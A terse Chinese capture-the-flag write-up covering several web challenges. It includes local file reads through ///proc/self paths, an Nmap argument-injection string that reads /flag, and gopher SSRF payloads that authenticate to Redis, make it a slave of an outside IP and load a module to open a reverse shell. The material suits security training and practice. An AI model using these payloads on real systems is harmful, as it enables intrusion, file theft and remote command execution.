白虎

PicDown

过滤了file,两种解法local-file协议 或者// pyhton中两个斜杠代表file协议 buu的环境用不了local-file
读一下///proc/self/cmdline 得到app.py 然后读一下///proc/self/cwd/app.py 读///proc/self/fd/3 得到密码

朱雀

phpweb

两种方法 \system 绕过过滤 或者 unserialize

Nmap

1
127.0.0.1' -iL /flag -oN cop.txt '

玄武

ssrfme

https://www.freebuf.com/column/237589.html
dns重定向绕,或者0.0.0.0绕,然后给了redis密码,把目录设置为/tmp

1
2
3
4
5
6
7
8
设置目录
?url=gopher://0.0.0.0:6379/_auth%2520root%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit

主从复制 rogue redis脚本用py2跑
?url=gopher://0.0.0.0:6379/_auth%2520root%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520174.1.147.219%25206002%250d%250aquit

加载so文件反弹shell
?url=gopher://0.0.0.0:6379/_auth%2520root%250d%250amodule%2520load%2520/tmp/exp.so%250d%250asystem.rev%2520174.1.147.219%252060003%250d%250aquit